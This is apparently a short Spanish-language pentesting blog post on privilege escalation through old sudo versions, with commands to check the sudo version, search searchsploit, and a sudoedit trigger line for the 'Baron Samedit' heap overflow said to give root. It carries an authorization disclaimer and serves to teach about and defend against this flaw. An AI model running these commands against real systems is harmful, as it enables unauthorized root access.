~ / blog / pentesting
KALI

Privesc por versión de sudo

A veces la escalada no está en la configuración, sino en un fallo del propio sudo.

Revisa la versión con sudo menos V, y compárala con vulnerabilidades conocidas. Por ejemplo, versiones viejas fueron afectadas por fallos famosos que dan root incluso sin permisos sudo.

Con searchsploit buscas el exploit para esa versión exacta. Mantener sudo actualizado no es opcional.

La versión que corres importa tanto como cómo lo configuras.

# los comandos

www-data@victim:$ sudo --version | head -1copiar
Sudo version 1.8.31
www-data@victim:$ searchsploit sudo 1.8copiar
Sudo 1.8.x - 'Baron Samedit' Heap Overflow | linux/local/...
www-data@victim:$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')copiar
(si vulnerable, corrupción -> root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.